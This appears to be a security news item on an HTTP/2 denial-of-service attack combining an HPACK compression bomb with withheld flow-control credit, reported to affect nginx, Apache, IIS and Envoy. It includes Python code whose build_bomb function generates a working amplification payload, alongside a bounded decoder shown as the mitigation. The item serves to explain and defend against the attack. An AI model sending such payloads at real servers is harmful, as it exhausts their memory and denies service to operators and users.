HTTP/2 Bomb: a Hidden DoS Attack via HPACK and Flow Control

The article describes a denial-of-service (DoS) vulnerability in HTTP/2 arising from the interaction of header compression (HPACK) and flow control. The core issue is that a specially crafted header block forces the server to allocate far more memory than it received on the wire: a header compression bomb, where a handful of compressed bytes decode into kilobytes of headers each. The article reports that widely used servers such as nginx, Apache, IIS and Envoy are affected.
The attack combines two techniques: an HPACK compression bomb and holding the connection open. First, the server is forced to allocate a large amount of memory while decoding the header block; then the client withholds flow-control credit (the WINDOW_UPDATE frames the server needs before it can write the response), so the stream is never completed and the memory attached to it is never released. Because the decoded size, not the received size, is what the server pays for, a single client can exhaust server memory and cause service unavailability with minimal traffic.
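The amplification half of the attack, as an added example that is not code from the original article: a minimal HPACK (RFC 7541) encoder and decoder in Python. One literal header with incremental indexing installs an entry of about 4 KB in the dynamic table; every following single octet 0xBE is an indexed reference (index 62) that decodes back into that full entry, so roughly 20 KB on the wire becomes roughly 64 MB of header list. The decoder also shows the mitigation a server needs: accounting the header list size while decoding and aborting as soon as SETTINGS_MAX_HEADER_LIST_SIZE would be exceeded, instead of after the whole block has been materialised. Only the two HPACK representations the demonstration needs are implemented (raw string literals only; no Huffman coding, static-table lookups or dynamic-table eviction), and the repeat count of 16000 and the 4000-byte value are arbitrary choices for the demo.

```python
"""Minimal HPACK (RFC 7541) encoder/decoder showing a header compression bomb and
bounded decoding.  Added example, not the article's code.  Only indexed fields and
literals with incremental indexing (raw, non-Huffman strings) are implemented."""

STATIC_TABLE_SIZE = 61   # RFC 7541 Appendix A: dynamic-table entries start at index 62
ENTRY_OVERHEAD = 32      # per-header size overhead (RFC 7541 s4.1, RFC 7540 s6.5.2)


class HeaderListTooLarge(Exception):
    """Decoded header list would exceed the advertised SETTINGS_MAX_HEADER_LIST_SIZE."""


def encode_int(value, prefix_bits, flags):
    """HPACK integer representation (RFC 7541 section 5.1) with the given prefix flags."""
    limit = (1 << prefix_bits) - 1
    if value < limit:
        return bytes([flags | value])
    out = bytearray([flags | limit])
    value -= limit
    while value >= 128:
        out.append((value & 0x7F) | 0x80)
        value >>= 7
    out.append(value)
    return bytes(out)


def encode_literal_with_indexing(name, value):
    """'01' prefix, new name and value as raw string literals; entry is added to the table."""
    return (encode_int(0, 6, 0x40)
            + encode_int(len(name), 7, 0x00) + name
            + encode_int(len(value), 7, 0x00) + value)


def encode_indexed(index):
    """'1' prefix: a one-octet reference (for index < 127) to a table entry."""
    return encode_int(index, 7, 0x80)


def build_bomb(repeat, value_len=4000):
    """One literal installs a 1 + 4000 + 32 = 4033 octet entry (fits the default 4096-octet
    table); each following octet 0xBE references index 62 and decodes to the whole entry."""
    block = encode_literal_with_indexing(b"x", b"A" * value_len)
    return block + encode_indexed(STATIC_TABLE_SIZE + 1) * repeat


def decode_int(data, pos, prefix_bits):
    limit = (1 << prefix_bits) - 1
    value = data[pos] & limit
    pos += 1
    if value < limit:
        return value, pos
    shift = 0
    while True:
        octet = data[pos]
        pos += 1
        value += (octet & 0x7F) << shift
        shift += 7
        if not octet & 0x80:
            return value, pos


def decode_string(data, pos):
    if data[pos] & 0x80:
        raise NotImplementedError("Huffman-coded strings are not needed for this demo")
    length, pos = decode_int(data, pos, 7)
    return bytes(data[pos:pos + length]), pos + length


def decode_block(block, max_header_list_size=None):
    """Return ([(name, value)], header_list_size).  With a limit, abort as soon as the
    running size exceeds it: the check must run during decoding, because a decoder that
    only checks after materialising the whole block has already paid for the bomb."""
    dynamic = []     # newest entry first; absolute index = 62 + position
    headers = []
    size = 0
    pos = 0
    while pos < len(block):
        octet = block[pos]
        if octet & 0x80:                                  # indexed header field
            index, pos = decode_int(block, pos, 7)
            slot = index - STATIC_TABLE_SIZE - 1
            if slot < 0 or slot >= len(dynamic):
                raise ValueError(f"index {index} is outside this dynamic-only table model")
            name, value = dynamic[slot]
        elif octet & 0xC0 == 0x40:                        # literal with incremental indexing
            name_index, pos = decode_int(block, pos, 6)
            if name_index != 0:
                raise ValueError("indexed names are not modelled here")
            name, pos = decode_string(block, pos)
            value, pos = decode_string(block, pos)
            dynamic.insert(0, (name, value))
        else:
            raise ValueError(f"unsupported representation 0x{octet:02x} at offset {pos}")
        # In this model the tuples share one bytes object, so the demo itself stays small;
        # `size` is what a server that copies header values into its request object allocates.
        size += len(name) + len(value) + ENTRY_OVERHEAD
        if max_header_list_size is not None and size > max_header_list_size:
            raise HeaderListTooLarge(f"header list would exceed {max_header_list_size} octets "
                                     f"after {pos} of {len(block)} input octets")
        headers.append((name, value))
    return headers, size


def amplification(repeat=16000):
    """(compressed octets, decoded header-list octets, integer amplification ratio)."""
    bomb = build_bomb(repeat)
    _, size = decode_block(bomb)
    return len(bomb), size, size // len(bomb)
```

Calling `amplification()` gives 20006 octets on the wire against 64532033 octets of decoded header list, an amplification above 3000x, and `decode_block(build_bomb(16000), max_header_list_size=64 * 1024)` raises `HeaderListTooLarge` after reading only 4022 of the 20006 input octets. Bounding the decoder is what caps the first half of the attack; the flow-control half additionally requires the server to limit how long an unfinished stream may hold its decoded headers while the peer's window stays at zero.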
Vendors
Califio
Products
Apache
Envoy
HPACK
HTTP/2
IIS
Nginx
Published
2026-06-09, 09:21